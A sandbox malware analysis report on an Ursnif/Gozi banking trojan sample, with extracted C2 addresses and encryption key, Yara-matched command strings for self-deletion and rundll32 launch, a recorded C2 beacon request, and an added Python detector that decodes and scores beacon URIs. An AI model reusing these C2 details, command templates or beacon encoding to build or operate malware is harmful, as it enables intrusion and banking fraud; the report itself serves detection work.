
Windows Analysis Report
server.exe

Overview

General Information

Sample Name: server.exe
Analysis ID: 826308
MD5: 8f092511c91bfc1f2516e420739a7967
SHA1: dc67d8f55a6591d16c2709ea65ad143e3a216ec0
SHA256: 9261b47b4fd67523f7afe640e55ccb95ec8b154b5dfa34a8564986ac3e97fe1a
Tags: agenziaentrate, exe, gozi, isfb, mef, mise, ursnif

Detection

Ursnif
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Detected unpacking (overwrites its own PE header)
Snort IDS alert for network traffic
Yara detected Ursnif
Found evasive API chain (may stop execution after checking system information)
Writes or reads registry keys via WMI
Writes registry values via WMI
Found API chain indicative of debugger detection
Machine Learning detection for sample
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Internet Provider seen in connection with other malware
Contains functionality to call native functions
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Contains functionality to dynamically determine API calls
IP address seen in connection with other malware

Classification

  • System is w10x64
  • server.exe (PID: 5540 cmdline: C:\Users\user\Desktop\server.exe MD5: 8F092511C91BFC1F2516E420739A7967)
  • cleanup
Malware family reference (Name | Description | Attribution | Blogpost URLs | Link):

Name: Gozi, Ursnif
Description:
  2000 Ursnif aka Snifula
  2006 Gozi v1.0, Gozi CRM, CRM, Papras
  2010 Gozi v2.0, Gozi ISFB, ISFB, Pandemyia (*)
  (*) -> 2010 Gozi Prinimalka -> Vawtrak/Neverquest
  In 2006, Gozi v1.0 ('Gozi CRM' aka 'CRM') aka Papras was first observed. It was offered as a CaaS, known as 76Service. This first version of Gozi was developed by Nikita Kurmin, and he borrowed code from Ursnif aka Snifula, a spyware developed by Alexey Ivanov around 2000, and some other kits. Gozi v1.0 thus had a formgrabber module and often is classified as Ursnif aka Snifula. In September 2010, the source code of a particular Gozi CRM dll version was leaked, which led to Vawtrak/Neverquest (in combination with Pony) via Gozi Prinimalka (a slightly modified Gozi v1.0) and Gozi v2.0 (aka 'Gozi ISFB' aka 'ISFB' aka Pandemyia). This version came with a webinject module.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.gozi

Extracted malware configuration (Ursnif):
{
  "RSA Public Key": "2cHitNE2khtX8MPowN3OuEF+nIJiRQvDS0CByWczHAmlx7InAyPYhqz4W4BdwOQhPXM+cNmTKZrjXkeaD1W/JReU+0QfnRaZLQzMkbf/6hntYeJLN9kVYaXwOSubcfndLd/IRF3zHco37HpGyfr/fx+pYcUFQUpDPSBwxpcqOgAGHU0ELflY4Wg7JTro/JzFnlTf/qZRLIK0F3z73FRQhjYYH8ldszb/+eADX8rn6ird+QrxU0NdIdel89Q7IsIw6+kcDa/Uh8s29ZPGfilEQcNwZsKPhbL1nQo8gRUU9nCXs8mGibasUhj7JSzvSDXMce/idAcO3inRDu0kAkFPSSWXYHucvOV7UqKvwvqosHo=",
  "c2_domain": ["checklist.skype.com", "62.173.142.51", "94.103.183.153", "193.233.175.111", "109.248.11.145", "31.41.44.106", "191.96.251.201"],
  "botnet": "7713",
  "server": "50",
  "serpent_key": "rqDYWFa4uPXuBFMj",
  "sleep_time": "1",
  "CONF_TIMEOUT": "20",
  "SetWaitableTimer_value": "0"
}
Yara matches (Source | Rule | Description | Author | Strings):

Source: 00000000.00000003.494639050.0000000002C68000.00000004.00000020.00020000.00000000.sdmp
  Rule: JoeSecurity_Ursnif | Description: Yara detected Ursnif | Author: Joe Security
  Rule: Windows_Trojan_Gozi_fd494041 | Description: unknown | Author: unknown | Strings:
    • 0x1228:$a1: /C ping localhost -n %u && del "%s"
    • 0xea8:$a2: /C "copy "%s" "%s" /y && "%s" "%s"
    • 0xf00:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S"
    • 0xa9c:$a5: filename="%.4u.%lu"
    • 0x63a:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s
    • 0x876:$a8: %08X-%04X-%04X-%04X-%08X%04X
    • 0xbb7:$a8: %08X-%04X-%04X-%04X-%08X%04X
    • 0xe6d:$a9: &whoami=%s
    • 0xe56:$a10: %u.%u_%u_%u_x%u
    • 0xd63:$a11: size=%u&hash=0x%08x
    • 0xb1d:$a12: &uptime=%u
    • 0x6fb:$a13: %systemroot%\system32\c_1252.nls
    • 0x1298:$a14: IE10RunOnceLastShown_TIMESTAMP
  Rule: Windows_Trojan_Gozi_261f5ac5 | Description: unknown | Author: unknown | Strings:
    • 0xb54:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x
    • 0x63a:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s
    • 0xa68:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu"
    • 0xcf2:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s)
    • 0xd96:$a9: Software\AppDataLow\Software\Microsoft\
    • 0x1ce8:$a9: Software\AppDataLow\Software\Microsoft\
Source: 00000000.00000003.494532027.0000000002C68000.00000004.00000020.00020000.00000000.sdmp
  Rule: JoeSecurity_Ursnif | Description: Yara detected Ursnif | Author: Joe Security
  Rule: Windows_Trojan_Gozi_fd494041 | Description: unknown | Author: unknown | Strings:
    • 0x1228:$a1: /C ping localhost -n %u && del "%s"
    • 0xea8:$a2: /C "copy "%s" "%s" /y && "%s" "%s"
    • 0xf00:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S"
    • 0xa9c:$a5: filename="%.4u.%lu"
    • 0x63a:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s
    • 0x876:$a8: %08X-%04X-%04X-%04X-%08X%04X
    • 0xbb7:$a8: %08X-%04X-%04X-%04X-%08X%04X
    • 0xe6d:$a9: &whoami=%s
    • 0xe56:$a10: %u.%u_%u_%u_x%u
    • 0xd63:$a11: size=%u&hash=0x%08x
    • 0xb1d:$a12: &uptime=%u
    • 0x6fb:$a13: %systemroot%\system32\c_1252.nls
    • 0x1298:$a14: IE10RunOnceLastShown_TIMESTAMP
(27 further Yara entries are not included in this capture of the report)
      No Sigma rule has matched
Snort IDS alert:
  Timestamp: 03/14/23-16:02:33.550566
  Source: 192.168.2.5:49680
  Destination: 62.173.142.51:80
  Protocol: TCP
  SID: 2033203 (ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B))
  Classtype: A Network Trojan was detected


      AV Detection

Source: server.exe | ReversingLabs: Detection: 32%
Source: server.exe | Virustotal: Detection: 43%
Source: http://62.173.142.51/drew/kjSOZcm1saisXVulw/nMJdjuoxI5rY/D8rf0rwxZvy/xTo4u6qyfG2cqh/DrEm9eSMLtL3Mt_2 | Avira URL Cloud: Label: malware
Source: http://62.173.142.51/drew/kjSOZcm1saisXVulw/nMJdjuoxI5rY/D8rf0rwxZvy/xTo4u6qyfG2cqh/DrEm9eSMLtL3Mt_2BWc8v/UHxdAMkcyeaROQd9/EwiLplzlm9gCiDQ/KqEVG_2BN1u2apPrXD/iYwyB9P6y/3dh1O1SBALUj6nSMRJfH/HHlM5d4xQO9d95rkA_2/Bt59zcQMsfJpOgJC8GeSrH/5REGnF8guLwya/xQ1cfd2Y/w3tCRH4bjXIzu_2B_2F_2B5/MmfV_2FK_2/B5ux_2BgxJ6omqMfT/iSBh1mrWB9_2/BRaJgBOq4gEVdF7OIVd_2B/4.jlk | Avira URL Cloud: Label: malware
Source: http://62.173.142.51/ | Avira URL Cloud: Label: malware
Source: server.exe | Joe Sandbox ML: detected
Source: 0.2.server.exe.400000.0.unpack | Avira: Label: TR/Crypt.XPACK.Gen7
Source: 00000000.00000002.580738483.0000000002689000.00000004.00000020.00020000.00000000.sdmp | Malware Configuration Extractor: Ursnif {"RSA Public Key": "2cHitNE2khtX8MPowN3OuEF+nIJiRQvDS0CByWczHAmlx7InAyPYhqz4W4BdwOQhPXM+cNmTKZrjXkeaD1W/JReU+0QfnRaZLQzMkbf/6hntYeJLN9kVYaXwOSubcfndLd/IRF3zHco37HpGyfr/fx+pYcUFQUpDPSBwxpcqOgAGHU0ELflY4Wg7JTro/JzFnlTf/qZRLIK0F3z73FRQhjYYH8ldszb/+eADX8rn6ird+QrxU0NdIdel89Q7IsIw6+kcDa/Uh8s29ZPGfilEQcNwZsKPhbL1nQo8gRUU9nCXs8mGibasUhj7JSzvSDXMce/idAcO3inRDu0kAkFPSSWXYHucvOV7UqKvwvqosHo=", "c2_domain": ["checklist.skype.com", "62.173.142.51", "94.103.183.153", "193.233.175.111", "109.248.11.145", "31.41.44.106", "191.96.251.201"], "botnet": "7713", "server": "50", "serpent_key": "rqDYWFa4uPXuBFMj", "sleep_time": "1", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0"}

      Compliance

Source: C:\Users\user\Desktop\server.exe | Unpacked PE file: 0.2.server.exe.400000.0.unpack
Source: server.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\server.exe | File opened: C:\Windows\SysWOW64\msvcr100.dll

      Networking

Source: Traffic | Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.5:49680 -> 62.173.142.51:80
Source: global traffic | HTTP traffic detected:
  GET /drew/kjSOZcm1saisXVulw/nMJdjuoxI5rY/D8rf0rwxZvy/xTo4u6qyfG2cqh/DrEm9eSMLtL3Mt_2BWc8v/UHxdAMkcyeaROQd9/EwiLplzlm9gCiDQ/KqEVG_2BN1u2apPrXD/iYwyB9P6y/3dh1O1SBALUj6nSMRJfH/HHlM5d4xQO9d95rkA_2/Bt59zcQMsfJpOgJC8GeSrH/5REGnF8guLwya/xQ1cfd2Y/w3tCRH4bjXIzu_2B_2F_2B5/MmfV_2FK_2/B5ux_2BgxJ6omqMfT/iSBh1mrWB9_2/BRaJgBOq4gEVdF7OIVd_2B/4.jlk HTTP/1.1
  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
  Host: 62.173.142.51
  Connection: Keep-Alive
  Cache-Control: no-cache
Source: Joe Sandbox View | ASN Name: SPACENET-ASInternetServiceProviderRU
Source: unknown | DNS traffic detected: query: checklist.skype.com, reply code: Name error (3) (NXDOMAIN)
Source: Joe Sandbox View | IP Address: 62.173.142.51
Source: unknown | TCP traffic detected without corresponding DNS query: 62.173.142.51 (reported five times)
Source: server.exe, 00000000.00000002.580755093.000000000281C000.00000004.00000010.00020000.00000000.sdmp | String found in binary or memory: http://62.173
Source: server.exe, 00000000.00000002.580573765.0000000000706000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://62.173.142.51/
Source: server.exe, 00000000.00000002.580573765.0000000000706000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://62.173.142.51/drew/kjSOZcm1saisXVulw/nMJdjuoxI5rY/D8rf0rwxZvy/xTo4u6qyfG2cqh/DrEm9eSMLtL3Mt_2
Source: unknown | DNS traffic detected: queries for: checklist.skype.com
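The beacon recorded above is the part of this report a detection engineer can act on directly: the Snort rule keys on the `_2B` token in the URI, the User-Agent matches the `Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s)` format string from the Windows_Trojan_Gozi_261f5ac5 match, the Host is an address from the extracted c2_domain list, and the lookup of checklist.skype.com returned NXDOMAIN before the bot went straight to the IP. The Python below is an added example, not part of the Joe Sandbox report and not Ursnif tooling. It unwraps the URI the way ISFB builds it (base64 of Serpent-CBC ciphertext with `+`, `/`, `=` rewritten as `_2B`, `_2F`, `_3D`, then slashes inserted at random); that scheme is my reading and an assumption here, as are the single fixed prefix directory, the cosmetic file extension, the six-segment depth threshold and the three-indicator verdict. The sample requests are constructed; the first copies the request line and headers recorded above.

```python
"""Ursnif/ISFB beacon URI checks, run over constructed HTTP request lines."""
import base64
import re

# ISFB hides its check-in in the URI path: Serpent-CBC ciphertext -> base64 ->
# the base64 characters '+', '/', '=' rewritten as '_2B', '_2F', '_3D' ->
# slashes inserted at random so the blob looks like a deep directory tree.
# This token table is my reading of that scheme (assumption); the report only
# shows the '_2B' form, which is what the Snort rule keys on.
_TOKENS = {"_2B": "+", "_2F": "/", "_3D": "="}
_TOKEN_RE = re.compile(r"_(?:2B|2F|3D)")
# Format string "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s)" from the
# Windows_Trojan_Gozi_261f5ac5 $a5 match, with %u.%u filled by the OS version.
_UA_RE = re.compile(r"^Mozilla/4\.0 \(compatible; MSIE 8\.0; Windows NT \d+\.\d+")
# c2_domain list copied from the extracted configuration on this page.
C2_FROM_CONFIG = {
    "checklist.skype.com", "62.173.142.51", "94.103.183.153", "193.233.175.111",
    "109.248.11.145", "31.41.44.106", "191.96.251.201",
}

# Constructed sample requests: the first reproduces the request line and headers
# the sandbox recorded, the other two are made up for contrast.
SAMPLE_REQUESTS = [
    "GET /drew/kjSOZcm1saisXVulw/nMJdjuoxI5rY/D8rf0rwxZvy/xTo4u6qyfG2cqh/DrEm9eSMLtL3Mt_2BWc8v/UHxdAMkcyeaROQd9/EwiLplzlm9gCiDQ/KqEVG_2BN1u2apPrXD/iYwyB9P6y/3dh1O1SBALUj6nSMRJfH/HHlM5d4xQO9d95rkA_2/Bt59zcQMsfJpOgJC8GeSrH/5REGnF8guLwya/xQ1cfd2Y/w3tCRH4bjXIzu_2B_2F_2B5/MmfV_2FK_2/B5ux_2BgxJ6omqMfT/iSBh1mrWB9_2/BRaJgBOq4gEVdF7OIVd_2B/4.jlk HTTP/1.1\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)\r\n"
    "Host: 62.173.142.51\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n",
    "GET /index.html HTTP/1.1\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)\r\nHost: www.example.com\r\n",
    "GET /images/logo.png HTTP/1.1\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)\r\n"
    "Host: intranet.example.com\r\n",
]


def path_to_base64(path: str, prefix_segments: int = 1) -> str:
    """Undo the URI wrapping. Assumes one fixed leading directory ('/drew/' in
    the report) and a cosmetic file extension on the last segment."""
    segments = [s for s in path.split("/") if s][prefix_segments:]
    if not segments:
        return ""
    segments[-1] = segments[-1].split(".", 1)[0]      # drop the ".jlk" decoration
    joined = "".join(segments)                         # slashes out first: they can split a token
    return _TOKEN_RE.sub(lambda m: _TOKENS[m.group(0)], joined)


def decode_beacon_path(path: str) -> bytes:
    """Return the ciphertext carried by the path. It is still Serpent-encrypted
    with the configuration's serpent_key; decryption is outside this example."""
    b64 = path_to_base64(path)
    if not b64 or not re.fullmatch(r"[A-Za-z0-9+/]+={0,2}", b64):
        raise ValueError("path does not unwrap to a base64 payload")
    b64 += "=" * (-len(b64) % 4)                       # the bot drops the padding
    return base64.b64decode(b64, validate=True)


def encode_beacon_path(ciphertext: bytes, prefix: str = "drew",
                       ext: str = "jlk", step: int = 9) -> str:
    """Inverse of path_to_base64, used to test the decoder. Slashes go in every
    `step` characters; the bot places them at random, so they can land inside a
    '_2B' token exactly as in the recorded URI."""
    if not ciphertext:
        raise ValueError("nothing to encode")
    b64 = base64.b64encode(ciphertext).decode()
    for plain, token in (("+", "_2B"), ("/", "_2F"), ("=", "_3D")):
        b64 = b64.replace(plain, token)
    chunks = [b64[i:i + step] for i in range(0, len(b64), step)]
    chunks[-1] += "." + ext
    return "/" + "/".join([prefix] + chunks)


def parse_request(raw: str) -> tuple:
    """Split a raw HTTP request (request line plus headers) into path and headers."""
    lines = raw.strip().splitlines()
    _method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return path, headers


def classify_request(raw: str) -> dict:
    """Score one request against the traits this sandbox run exposed. The
    six-segment depth and the three-indicator verdict are my thresholds."""
    path, headers = parse_request(raw)
    segments = [s for s in path.split("/") if s]
    indicators = {
        "msie8_ua": bool(_UA_RE.match(headers.get("user-agent", ""))),
        "escaped_b64_tokens": bool(_TOKEN_RE.search(path.replace("/", ""))),
        "deep_path": len(segments) >= 6,
        "host_in_config_c2": headers.get("host", "") in C2_FROM_CONFIG,
        "block_aligned_payload": False,
    }
    try:
        payload = decode_beacon_path(path)
        indicators["block_aligned_payload"] = len(payload) % 16 == 0   # Serpent block size
    except ValueError:                                  # binascii.Error is a ValueError
        pass
    score = sum(indicators.values())
    return {"path": path, "indicators": indicators, "score": score,
            "ursnif_like": score >= 3}


if __name__ == "__main__":
    for raw in SAMPLE_REQUESTS:
        verdict = classify_request(raw)
        print(f"{verdict['ursnif_like']!s:5} score={verdict['score']} {verdict['path'][:48]}")
```

decode_beacon_path stops at the base64 layer on purpose: what comes out is Serpent ciphertext keyed with the serpent_key from the configuration, and the example does not decrypt it. Note the slash in HHlM5d4xQO9d95rkA_2/Bt59... in the recorded URI, which splits a `_2B` token across two path segments; that is why the decoder removes slashes before rewriting tokens, and why a rule that only matches the literal `_2B` in the URI (as the Snort signature does) can miss individual occurrences while still catching the others in the same path.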

      Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: Yara match | File source: 00000000.00000003.494639050.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.494532027.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.580772569.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.494557591.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.494507047.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.494595207.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.494478374.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.494674831.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.494622294.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: server.exe PID: 5540, type: MEMORYSTR

      E-Banking Fraud

Source: Yara match | File source: 00000000.00000003.494639050.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.494532027.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.580772569.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.494557591.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.494507047.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.494595207.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.494478374.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.494674831.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.494622294.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: server.exe PID: 5540, type: MEMORYSTR

      System Summary

Source: 00000000.00000003.494639050.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rules: Windows_Trojan_Gozi_fd494041, Windows_Trojan_Gozi_261f5ac5 | Author: unknown
Source: 00000000.00000003.494532027.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rules: Windows_Trojan_Gozi_fd494041, Windows_Trojan_Gozi_261f5ac5 | Author: unknown
Source: 00000000.00000002.580772569.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rules: Windows_Trojan_Gozi_fd494041, Windows_Trojan_Gozi_261f5ac5 | Author: unknown
Source: 00000000.00000003.494557591.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rules: Windows_Trojan_Gozi_fd494041, Windows_Trojan_Gozi_261f5ac5 | Author: unknown
Source: 00000000.00000003.494507047.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rules: Windows_Trojan_Gozi_fd494041, Windows_Trojan_Gozi_261f5ac5 | Author: unknown
Source: 00000000.00000003.494595207.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rules: Windows_Trojan_Gozi_fd494041, Windows_Trojan_Gozi_261f5ac5 | Author: unknown
Source: 00000000.00000003.494478374.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rules: Windows_Trojan_Gozi_fd494041, Windows_Trojan_Gozi_261f5ac5 | Author: unknown
Source: 00000000.00000002.580453253.0000000000540000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f | Author: unknown
Source: 00000000.00000002.580553464.00000000006A8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c | Author: unknown
Source: 00000000.00000003.494674831.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rules: Windows_Trojan_Gozi_fd494041, Windows_Trojan_Gozi_261f5ac5 | Author: unknown
Source: 00000000.00000003.494622294.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rules: Windows_Trojan_Gozi_fd494041, Windows_Trojan_Gozi_261f5ac5 | Author: unknown
Source: Process Memory Space: server.exe PID: 5540, type: MEMORYSTR | Matched rules: Windows_Trojan_Gozi_fd494041, Windows_Trojan_Gozi_261f5ac5 | Author: unknown
Source: C:\Users\user\Desktop\server.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Users\user\Desktop\server.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Users\user\Desktop\server.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\server.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Users\user\Desktop\server.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Users\user\Desktop\server.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\server.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: server.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Rule metadata for the matches listed above (identical for every source that matched the rule):
Windows_Trojan_Gozi_fd494041: reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
  Matched in: 00000000.00000003.494639050.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.494532027.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000002.580772569.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.494557591.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.494507047.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.494595207.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.494478374.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.494674831.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.494622294.0000000002C68000.00000004.00000020.00020000.00000000.sdmp (type: MEMORY); Process Memory Space: server.exe PID: 5540 (type: MEMORYSTR)
Windows_Trojan_Gozi_261f5ac5: reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
  Matched in: the same nine 0000000002C68000 memory dumps and the server.exe PID 5540 process memory space as Windows_Trojan_Gozi_fd494041
Windows_Trojan_Smokeloader_3687686f: reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
  Matched in: 00000000.00000002.580453253.0000000000540000.00000040.00001000.00020000.00000000.sdmp (type: MEMORY)
Windows_Trojan_RedLineStealer_ed346e4c: reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
  Matched in: 00000000.00000002.580553464.00000000006A8000.00000040.00000020.00020000.00000000.sdmp (type: MEMORY)
The Smokeloader and RedLineStealer rules each fire once, on regions (0x540000 and 0x6A8000) other than the 0x2C68000 dumps that carry the Ursnif strings and configuration, and no other signature, network indicator or AV label on this page corroborates either family; the report's detection remains Ursnif.
Source: C:\Users\user\Desktop\server.exe | Code function: 0_2_0040110B GetProcAddress,NtCreateSection,memset
Source: C:\Users\user\Desktop\server.exe | Code function: 0_2_00401459 NtMapViewOfSection
Source: C:\Users\user\Desktop\server.exe | Code function: 0_2_004019F1 NtQuerySystemInformation,Sleep,GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,CreateThread,QueueUserAPC,CloseHandle,GetLastError,TerminateThread,CloseHandle,SetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError
Source: C:\Users\user\Desktop\server.exe | Code function: 0_2_00541C58 NtQuerySystemInformation,Sleep,GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,CreateThread,QueueUserAPC,GetLastError,TerminateThread,SetLastError,WaitForSingleObject,GetExitCodeThread,GetLastError,GetLastError
Source: server.exe | ReversingLabs: Detection: 32%
Source: server.exe | Virustotal: Detection: 43%
Source: server.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\server.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\server.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32 (CLSID_WbemLocator, consistent with the WMI StdRegProv registry calls above)
Source: classification engine | Classification label: mal100.troj.evad.winEXE@1/0@1/1
Source: C:\Users\user\Desktop\server.exe | File read: C:\Windows\System32\drivers\etc\hosts (reported twice)
Source: C:\Users\user\Desktop\server.exe | File opened: C:\Windows\SysWOW64\msvcr100.dll

      Data Obfuscation

Source: C:\Users\user\Desktop\server.exe | Unpacked PE file: 0.2.server.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.bss:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\Desktop\server.exe | Unpacked PE file: 0.2.server.exe.400000.0.unpack
Source: C:\Users\user\Desktop\server.exe | Code function: 0_2_00401000 LoadLibraryA,GetProcAddress

      Hooking and other Techniques for Hiding and Protection

Source: Yara match | File source: 00000000.00000003.494639050.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.494532027.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.580772569.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.494557591.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.494507047.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.494595207.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.494478374.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.494674831.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
